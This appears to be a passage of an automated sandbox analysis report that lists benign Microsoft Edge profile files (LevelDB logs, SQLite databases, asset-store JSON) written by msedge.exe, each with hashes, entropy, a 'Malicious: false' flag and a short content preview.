Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	309
Entropy (8bit):	5.218829027573429
Encrypted:	false
SSDEEP:	6:HUteksFJ4M1923oH+Tcwtp3hBtB2KLlVUteamq2P923oH+Tcwtp3hBWsIFUv:GkJ4hYebp3dFLgmv4Yebp3eFUv
MD5:	F098E19EB9F71691057534BC576E7881
SHA1:	571001FE2335A1C99D8EE4CEB0BAB96211AF32E0
SHA-256:	F2E0A061552E471781857026136F51A59C75E3BCF5EE61CE90EA84D51CD51A98
SHA-512:	72F3DA79EDB998BD7E7250A39219A93A33028C3B8380C29EE7C0A760566495620603B32D30952C70D0201A5887068424CED78B518A3ACC73DF8F02BE5EA95231
Malicious:	false
Preview:	2024/11/13-14:39:41.298 1e44 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform/auto_show_data.db since it was missing..2024/11/13-14:39:41.361 1e44 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform/auto_show_data.db/MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\MANIFEST-000001

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	OpenPGP Secret Key
Category:	dropped
Size (bytes):	41
Entropy (8bit):	4.704993772857998
Encrypted:	false
SSDEEP:	3:scoBAIxQRDKIVjn:scoBY7jn
MD5:	5AF87DFD673BA2115E2FCF5CFDB727AB
SHA1:	D5B5BBF396DC291274584EF71F444F420B6056F1
SHA-256:	F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
SHA-512:	DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
Malicious:	false
Preview:	.\|.."....leveldb.BytewiseComparator......

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\000003.ldb

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	739857
Entropy (8bit):	7.212331895399726
Encrypted:	false
SSDEEP:	12288:gq1f5g+/pask721JH7SgyIhkNEqeyZ/CSCqEzz5SaOPrHc/t:P5gypaskWt7SgyfNEq1Z/jvQzEaA2t
MD5:	23A1A65BDCD086DD79B0197AEB9B23EC
SHA1:	4ED2B2CA86E2BD60FE019EBDACD7CE3045033A03
SHA-256:	5B75F61A2BB99B720A51DE8A3EB7D582C170BDD594CBC46462BC7DCF8FA867CC
SHA-512:	A9FDD6A3381051F691E187F08AB2D93E7097AD5598F248676576F4151A76888D0B0E186F60D104F3A28848C6753C956F46D63422238AF4726EC660D4043880E3
Malicious:	false
Preview:	....^.'..ASSET:addressbar_uu_files.en-gb........{. "0123movies.com": "{\"Tier1\": [983, 6061], \...2..L4948, 1106, 9972]}",.QL1020398.app.netsuiteR[.@6061, 8405, 5938]6b..228, 236.Z.337x.toB...J.983:C.86657, 475, 4068.JX2cvresearch.decipherincR....:X. 379, 6101.R<3817341.extforms....774..L3cx.integrafin.co.ukB.....,N.. 2863, 539...4540582....[:..1.., 6..P7589.directpaper.nameR..:Q.9I`7a201srvitportl.cymru.nhsN..:F..9870.J.03cjsvmifitla1vJ.AC:N..109]..7.N.livwebbvN..1a.JS...., 9813.. 8ballpoolV~. 741, 3907.8>...9151, 57E..91]5 9anime.gsB~.F'.,574, 485, 76....D.pl.D..?., 160=..EJ..:o....166V...gagR ..3939..>..<378, 44, 1780, 1....8a.leaguerepubliV..)u!.:...676, 899...aad.A..al.azur~..:Q..53...23.. 915, 8133...2}..aat.rm...isR..:W..223...42].Dabc-enviro.tascomiRJ..884>...40!N$4662, 5849=N4bdn.blackboardRQ..7670....:...80..$1240, 3047.].Terdeenshire.sharepointRf..5938.f.214Be..0...30}~.abmwapv..R..!..7662[..mwczK..14>.......cacd...mBt.J...117...(cademic.oupR..)..834AbF...246e)..!..q...

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	modified
Size (bytes):	2163821
Entropy (8bit):	5.222882769830323
Encrypted:	false
SSDEEP:	24576:v+/PN8FsfI/MXhZSihQgCmnVAEpENU2iOYcafbE2n:v+/PN8ifx2mjF
MD5:	3DDF4BE53370078C24B52467B3CD5591
SHA1:	05C0D1C83DDC6F98D3D9F82F43EAF0FC08E33D52
SHA-256:	A06A451D6970365559CAABE0AE55FCB3FA307EA0599F2000FBDF0732326325A9
SHA-512:	772DC5173233F99B9ADEBB274C92E662FA7538F7B1704F894BE78E0403D9F4F20292B4801592DBC7CFE5FD2E0CE948ACDB04A57F64E1891DB36A4F763FED42B9
Malicious:	false
Preview:	...m.................DB_VERSION.1.l.i.................QUERY_TIMESTAMP:arbitration_priority_list4...13340900604462938.$QUERY:arbitration_priority_list4....[{"name":"arbitration_priority_list","url":"https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?sv=2017-07-29&sr=c&sig=NtPyTqjbjPElpw2mWa%2FwOk1no4JFJEK8%2BwO4xQdDJO4%3D&st=2021-01-01T00%3A00%3A00Z&se=2023-12-30T00%3A00%3A00Z&sp=r&assetgroup=ArbitrationService","version":{"major":4,"minor":0,"patch":5},"hash":"N0MkrPHaUyfTgQSPaiVpHemLMcVgqoPh/xUYLZyXayg=","size":11749}]...................'ASSET_VERSION:arbitration_priority_list.4.0.5..ASSET:arbitration_priority_list.[{. "configVersion": 32,. "PrivilegedExperiences": [. "ShorelinePrivilegedExperienceID",. "SHOPPING_AUTO_SHOW_COUPONS_CHECKOUT",. "SHOPPING_AUTO_SHOW_LOWER_PRICE_FOUND",. "SHOPPING_AUTO_SHOW_BING_SEARCH",. "SHOPPING_AUTO_SHOW_REBATES",. "SHOPPING_AUTO_SHOW_REBATES_CONFIRMATION",. "SHOPPING_AUTO_SHOW_REBATES_DEACTI

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\000004.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	modified
Size (bytes):	387
Entropy (8bit):	5.555321198838628
Encrypted:	false
SSDEEP:	6:D/1g7Xzwk89W0OB4nwk8RL6GzwkpoXrDVvskoafRUjGSIpO6gpXj8VW3AnY4n:Bo80F2l8tDivx5/e9IM6NW3AVn
MD5:	A968C06B8A4D214D3022F596D5454120
SHA1:	E413937CD65AE36879DD467A397B2B94617C72FE
SHA-256:	A7549964CA472500ABB77DA3A8570719E3CAE4FDD256A4B22B53A391F61A6DCB
SHA-512:	E7BBD180C44642DE85ED196747BCC0EF0537B1DC689B06035AB6EF627953EFFDFBA4FF0C289F132ABD4683F614FBDC3977474EBFC92ED13ED3AA5DFADC2BA2B5
Malicious:	false
Preview:	o.(.\|................QUERY_TIMESTAMP:addressbar_uu_files.en-gb1...13376000563510500.$QUERY:addressbar_uu_files.en-gb1....[{"name":"addressbar_uu_files.en-gb","url":"https://edgeassetservice.azureedge.net/assets/addressbar_uu_files.en-gb/1.0.2/asset?assetgroup=AddressBar","version":{"major":1,"minor":0,"patch":2},"hash":"Z0h6vxfeYITPbRF/BVHpLTuo3HCwjRfTaFYDRReZ7yg=","size":403024}]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	353
Entropy (8bit):	5.115256233684285
Encrypted:	false
SSDEEP:	6:HUsQSj1yq2P923oH+Tcwt9Eh1tIFUt8YUsQSKGR11Zmw+YUsQSVef0PXUsQSfefK:JQQyv4Yeb9Eh16FUt8eQO9/+eQefxQER
MD5:	6ECC149FB2C692E0080B9B084613C56B
SHA1:	A21F4AA6D6355C1D0286064861ACF1A7B1456803
SHA-256:	E2A1D3366008536B3A032FCBB0A2669939B6B2EE296D0B51BB6C91BF5515AE23
SHA-512:	488148D39F2161CCFFFE6D93C32F5A8694E72E74C41CC1A5417D906D6D19A53289314BD0BB05644C053A5946F293ACA5130FFCC25B69D5606C37AEFF85CD3907
Malicious:	false
Preview:	2024/11/13-14:42:41.706 ec4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.2024/11/13-14:42:41.708 ec4 Recovering log #3.2024/11/13-14:42:41.735 ec4 Level-0 table #3: started.2024/11/13-14:42:41.791 ec4 Level-0 table #3: 739857 bytes OK.2024/11/13-14:42:41.796 ec4 Delete type=0 #3.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	353
Entropy (8bit):	5.115256233684285
Encrypted:	false
SSDEEP:	6:HUsQSj1yq2P923oH+Tcwt9Eh1tIFUt8YUsQSKGR11Zmw+YUsQSVef0PXUsQSfefK:JQQyv4Yeb9Eh16FUt8eQO9/+eQefxQER
MD5:	6ECC149FB2C692E0080B9B084613C56B
SHA1:	A21F4AA6D6355C1D0286064861ACF1A7B1456803
SHA-256:	E2A1D3366008536B3A032FCBB0A2669939B6B2EE296D0B51BB6C91BF5515AE23
SHA-512:	488148D39F2161CCFFFE6D93C32F5A8694E72E74C41CC1A5417D906D6D19A53289314BD0BB05644C053A5946F293ACA5130FFCC25B69D5606C37AEFF85CD3907
Malicious:	false
Preview:	2024/11/13-14:42:41.706 ec4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.2024/11/13-14:42:41.708 ec4 Recovering log #3.2024/11/13-14:42:41.735 ec4 Level-0 table #3: started.2024/11/13-14:42:41.791 ec4 Level-0 table #3: 739857 bytes OK.2024/11/13-14:42:41.796 ec4 Delete type=0 #3.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\LOG.old~RF674a6.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	353
Entropy (8bit):	5.115256233684285
Encrypted:	false
SSDEEP:	6:HUsQSj1yq2P923oH+Tcwt9Eh1tIFUt8YUsQSKGR11Zmw+YUsQSVef0PXUsQSfefK:JQQyv4Yeb9Eh16FUt8eQO9/+eQefxQER
MD5:	6ECC149FB2C692E0080B9B084613C56B
SHA1:	A21F4AA6D6355C1D0286064861ACF1A7B1456803
SHA-256:	E2A1D3366008536B3A032FCBB0A2669939B6B2EE296D0B51BB6C91BF5515AE23
SHA-512:	488148D39F2161CCFFFE6D93C32F5A8694E72E74C41CC1A5417D906D6D19A53289314BD0BB05644C053A5946F293ACA5130FFCC25B69D5606C37AEFF85CD3907
Malicious:	false
Preview:	2024/11/13-14:42:41.706 ec4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.2024/11/13-14:42:41.708 ec4 Recovering log #3.2024/11/13-14:42:41.735 ec4 Level-0 table #3: started.2024/11/13-14:42:41.791 ec4 Level-0 table #3: 739857 bytes OK.2024/11/13-14:42:41.796 ec4 Delete type=0 #3.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\MANIFEST-000001

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	OpenPGP Secret Key
Category:	dropped
Size (bytes):	148
Entropy (8bit):	5.465592091960299
Encrypted:	false
SSDEEP:	3:scoBAIxQRDKIVjV+nhsn5smszAETD9WLHEm1eaJgW6KC3Lk:scoBY7jcnhMemszwk5ogw5
MD5:	72338E361EC51A732F1A7862986FA239
SHA1:	F5CC1EA2CE2E1CD126AD763038825FB6A49B2B2A
SHA-256:	1B2FCD8B59C232FA1D3776E8257CE7ACA79B1C16F5962EED0D0332FDC75D56C2
SHA-512:	70615BE4458F69293787CAA4BAFB1684BEA4A87797247F7342A8C0A94A0CC7AEF13CA5DCAECADC57EE1269016BE71A7027CEC03F2F3B3767D75795DB1C8F8B73
Malicious:	false
Preview:	.\|.."....leveldb.BytewiseComparator......NG.5d...............-'ASSET:addressbar_uu_files.en-gb........-QUERY_TIMESTAMP:signal_triggers1.13.*........

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DIPS

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	0.4624878487739867
Encrypted:	false
SSDEEP:	24:TLi5YFQq3qh7z3WMYziciNW9WkZ96UwOfBuvHXB:TouQq3qh7z3bY2LNW9WMcUvBufB
MD5:	67F911E77FE6E69F69D47ED8ACF67751
SHA1:	0B98878F8F6ACFF54A19B48C456980045F669746
SHA-256:	C34AFF899621106A2C22FFAB745EB5026737F8C8BF783060AF96363A78CCA7E1
SHA-512:	F75B796CCFC2B6102B1069E699DA3E1BDA3EF81E36B2D8237DCB6808763C7147019B5D90077DA46B3A31982693FBBDB598595CD682BE16ACAC62D5C6BF300609
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g.....8...n................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DashTrackerDatabase

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 5, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 5
Category:	dropped
Size (bytes):	10240
Entropy (8bit):	0.8708334089814068
Encrypted:	false
SSDEEP:	12:LBtW4mqsmvEFUU30dZV3lY7+YNbr1dj3BzA2ycFUxOUDaazMvbKGxiTUwZ79GV:LLaqEt30J2NbDjfy6UOYMvbKGxjgm
MD5:	92F9F7F28AB4823C874D79EDF2F582DE
SHA1:	2D4F1B04C314C79D76B7FF3F50056ECA517C338B
SHA-256:	6318FCD9A092D1F5B30EBD9FB6AEC30B1AEBD241DC15FE1EEED3B501571DA3C7
SHA-512:	86FEF0E05F871A166C3FAB123B0A4B95870DCCECBE20B767AF4BDFD99653184BBBFE4CE1EDF17208B7700C969B65B8166EE264287B613641E7FDD55A6C09E6D4
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j...v... .. .....M....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DawnCache\data_1

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	270336
Entropy (8bit):	0.0018164538716206493
Encrypted:	false
SSDEEP:	3:MsEllllkEthXllkl2zEZlmmKt/:/M/xT02zKKt/
MD5:	52F847168F868C69170F9E0D4D04C035
SHA1:	00F9119376E1E9B90E0A01DDC0A0026E0FF9C1F2
SHA-256:	ED5D620C86E35266B4DE9B946A2EEA4F5D2861C5C819B4F469D546B2B657BF2E
SHA-512:	937E5D2802020CBEA280D1D0208DC632C1304208C4345C84CA2F89AE83F3E6D01F87975ECF1D4CF37861AA2151C16ADF71DA2AD0CB46328DC1BD106904FECAE7
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	181
Entropy (8bit):	4.635545369082704
Encrypted:	false
SSDEEP:	3:iWstvhYNrkU/k/PoE28xfmc+Sl/38E28xp4m3rscUSWPWTHAz//lf+nETPxpK2xd:iptA8PoD8xfmc+G38D8xSEsI8v9+n0Px
MD5:	3670480A8A37930010E173DEAF19BCE6
SHA1:	7F7F86D3E3A1FFAA3E744BD1E39EC9021A92C4BB
SHA-256:	D1605134925F0270F444F0A59ABB2A23A9B8821F81F8B2BDBEE9AD8054B87C28
SHA-512:	AC7A40619D6CE4A1FDFEECE4A2C480CB5E4C759C3608DEB3B7158E03C27DC1CE7C97EA8D3569DB83E217A2E018816CE290270B405A5DB3A0B19C5514E6B808B6
Malicious:	false
Preview:	...m.................DB_VERSION.1.+3`.................BLOOM_FILTER:..M..9................BLOOM_FILTER_EXPIRY_TIME:.1731613316.758419....*................BLOOM_FILTER_LAST_MODIFIED:.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	348
Entropy (8bit):	5.231059085908784
Encrypted:	false
SSDEEP:	6:HUtDq2P923oH+TcwtnG2tMsIFUt8YUtQZmw+YUtYkwO923oH+TcwtnG2tMsLJ:Yv4Yebn9GFUt88/+85LYebn95J
MD5:	1AEE1CDAEA3214BF88DF26A2AE10B658
SHA1:	C030E4E0A5C80FF93ACF7CB04AD7D92D25913ED8
SHA-256:	EEC9AFB4CDE9DC3A78D9D212841056C76306D65BAAB2BF64B6E8E5C0BAEA2057
SHA-512:	BB9F265AA9B4661EB8697ECD7C680770795C8AA76A712C56808395D3AE3EFEAFE254921B127CC897C69E797ED1D641A5368DDD18C8B78DC82AA8D6E40598E427
Malicious:	false
Preview:	2024/11/13-14:39:36.790 1d80 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.2024/11/13-14:39:36.796 1d80 Recovering log #3.2024/11/13-14:39:36.796 1d80 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	348
Entropy (8bit):	5.231059085908784
Encrypted:	false
SSDEEP:	6:HUtDq2P923oH+TcwtnG2tMsIFUt8YUtQZmw+YUtYkwO923oH+TcwtnG2tMsLJ:Yv4Yebn9GFUt88/+85LYebn95J
MD5:	1AEE1CDAEA3214BF88DF26A2AE10B658
SHA1:	C030E4E0A5C80FF93ACF7CB04AD7D92D25913ED8
SHA-256:	EEC9AFB4CDE9DC3A78D9D212841056C76306D65BAAB2BF64B6E8E5C0BAEA2057
SHA-512:	BB9F265AA9B4661EB8697ECD7C680770795C8AA76A712C56808395D3AE3EFEAFE254921B127CC897C69E797ED1D641A5368DDD18C8B78DC82AA8D6E40598E427
Malicious:	false
Preview:	2024/11/13-14:39:36.790 1d80 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.2024/11/13-14:39:36.796 1d80 Recovering log #3.2024/11/13-14:39:36.796 1d80 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeHubAppUsage\EdgeHubAppUsageSQLite.db

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 6
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6130827505370573
Encrypted:	false
SSDEEP:	12:TLs9pRSJDBJuqJSEDNvrWjJQ9Dl9np59yDLgHFUxOUDaaTXubHa7mWsIkMAqyIGs:TLapR+DDNzWjJ0npnyXKUO8+jtpE4mL
MD5:	697431069AF4A39DDC6DB3E4F7D21F30
SHA1:	6B813FF7A5CA2FC60AC6252DE96B23638BFAC714
SHA-256:	3F1460D55547F189451B4E4DFFA7F49E759272A78F02ECE0CAB2B574DB4620FE
SHA-512:	F3FBBAEF42159630182B68E99E8BFB2FE6A8A7890AD60D4D1EA86320586D8E9A791228D50531CCC041F05A8CBD6375FBDDFB75E84BA252461FF898E474B4A5EF
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j...%.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\000001.dbtmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	375520
Entropy (8bit):	5.354126559922676
Encrypted:	false
SSDEEP:	6144:0A/imBpx6WdPSxKWcHu5MURacq49QxxPnyEndBuHltBfdK5WNbsVEziP/CfXtLPz:0FdMyq49tEndBuHltBfdK5WNbsVEziPU
MD5:	4A64C4975ADB7109B0CE0208DC698003
SHA1:	4A35F2EED1DD1CBBA969040B3705A3AD39AEF760
SHA-256:	38075DC77782B0036FA33022DF9984A233289B6FDFD1E874DD4E9CFBFAADC96C
SHA-512:	A2047A5B3043AB5DF054CA9B86EC0A960723D45E51E5B47A4BC571852B596CA9FAEA0D594B2E342F31510A3A164A6033B9B76E6E0149F3C52F64976391E0C76E
Malicious:	false
Preview:	...m.................DB_VERSION.1}..q...............&QUERY_TIMESTAMP:domains_config_gz2...13376000382972618..QUERY:domains_config_gz2....[{"name":"domains_config_gz","url":"https://edgeassetservice.azureedge.net/assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtractionDomainsConfig","version":{"major":2,"minor":8,"patch":76},"hash":"78Xsq/1H+MXv88uuTT1Rx79Nu2ryKVXh2J6ZzLZd38w=","size":374872}]..*.`~...............ASSET_VERSION:domains_config_gz.2.8.76..ASSET:domains_config_gz...{"config": {"token_limit": 1600, "page_cutoff": 4320, "default_locale_map": {"bg": "bg-bg", "bs": "bs-ba", "el": "el-gr", "en": "en-us", "es": "es-mx", "et": "et-ee", "cs": "cs-cz", "da": "da-dk", "de": "de-de", "fa": "fa-ir", "fi": "fi-fi", "fr": "fr-fr", "he": "he-il", "hr": "hr-hr", "hu": "hu-hu", "id": "id-id", "is": "is-is", "it": "it-it", "ja": "ja-jp", "ko": "ko-kr", "lv": "lv-lv", "lt": "lt-lt", "mk": "mk-mk", "nl": "nl-nl", "nb": "nb-no", "no": "no-no", "pl": "pl-pl", "pt": "pt-pt", "ro": "

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\CURRENT (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	311
Entropy (8bit):	5.174486043860696
Encrypted:	false
SSDEEP:	6:HUtep1923oH+Tcwtk2WwnvB2KLlVUtekVRv4q2P923oH+Tcwtk2WwnvIFUv:6YebkxwnvFLuVZ4v4YebkxwnQFUv
MD5:	AB3049BDD0379F826196D0C60D9D0E76
SHA1:	DB3A15C6679150E89FAC717F664CF5BAF9A3E214
SHA-256:	99021378BF308F461D267ADA8E85B7F44EF9524828DDB642720C0C15E631EDD1
SHA-512:	A39132675F9731075C804B5113C4CE470B4A715E867A7A6BE151491CA86B8BBDF3B83660C71BA967F761ED98D0F0786BC7D3A44B491286175802F64F557497F8
Malicious:	false
Preview:	2024/11/13-14:39:41.168 2330 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db since it was missing..2024/11/13-14:39:41.279 2330 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db/MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\MANIFEST-000001

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	OpenPGP Secret Key
Category:	dropped
Size (bytes):	41
Entropy (8bit):	4.704993772857998
Encrypted:	false
SSDEEP:	3:scoBAIxQRDKIVjn:scoBY7jn
MD5:	5AF87DFD673BA2115E2FCF5CFDB727AB
SHA1:	D5B5BBF396DC291274584EF71F444F420B6056F1
SHA-256:	F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
SHA-512:	DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
Malicious:	false
Preview:	.\|.."....leveldb.BytewiseComparator......

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\domains_config.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	modified
Size (bytes):	358860
Entropy (8bit):	5.324620984994488
Encrypted:	false
SSDEEP:	6144:CgimBVvUrsc6rRA81b/18jyJNjfvrfM6R3:C1gAg1zfvv
MD5:	91680E11DEDE22FAF79EF2512CDC898A
SHA1:	ECF3247ED54ED024E1E2A4B50C13C912F71993C1
SHA-256:	41D90C6DBD0D1515B5366F085A1C7495B487BFA6360674B58A1BBAC7ADD29D71
SHA-512:	C723CD2D7000377B97E9E42955911666F8E9C1BE6DA4C7DD12286F15C08D8C385F97BD7C33E4FEAB7F640AC62C6609FF7E52D1666B69D5B13813F5EF6A1ED117
Malicious:	false
Preview:	{"aee_config":{"ar":{"price_regex":{"ae":"(((ae\|aed\|\\x{062F}\\x{0660}\\x{0625}\\x{0660}\|\\x{062F}\\.\\x{0625}\|dhs\|dh)\\s\\d{1,3})\|(\\d{1,3}\\s(ae\|aed\|\\x{062F}\\x{0660}\\x{0625}\\x{0660}\|\\x{062F}\\.\\x{0625}\|dhs\|dh)))","dz":"(((dzd\|da\|\\x{062F}\\x{062C})\\s\\d{1,3})\|(\\d{1,3}\\s(dzd\|da\|\\x{062F}\\x{062C})))","eg":"(((e\\x{00a3}\|egp)\\s\\d{1,3})\|(\\d{1,3}\\s(e\\x{00a3}\|egp)))","ma":"(((mad\|dhs\|dh)\\s\\d{1,3})\|(\\d{1,3}\\s(mad\|dhs\|dh)))","sa":"((\\d{1,3}\\s(sar\\s\\x{fdfc}\|sar\|sr\|\\x{fdfc}\|\\.\\x{0631}\\.\\x{0633}))\|((sar\\s\\x{fdfc}\|sar\|sr\|\\x{fdfc}\|\\.\\x{0631}\\.\\x{0633})\\s\\d{1,3}))"},"product_terms":"((\\x{0623}\\x{0636}\\x{0641}\\s\\x{0625}\\x{0644}\\x{0649}\\s\\x{0627}\\x{0644}\\x{0639}\\x{0631}\\x{0628}\\x{0629})\|(\\x{0623}\\x{0636}\\x{0641}\\s\\x{0625}\\x{0644}\\x{0649}\\s\\x{0627}\\x{0644}\\x{062D}\\x{0642}\\x{064A}\\x{0628}\\x{0629})\|(\\x{0627}\\x{0634}\\x{062A}\\x{0631}\\x{064A}\\s*\\x{0627}\\x{0644}\\x{0622}\\x{0646})\|(\\x{062E}\\x{064A}\\x{0627}\\x{0631}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	418
Entropy (8bit):	1.8784775129881184
Encrypted:	false
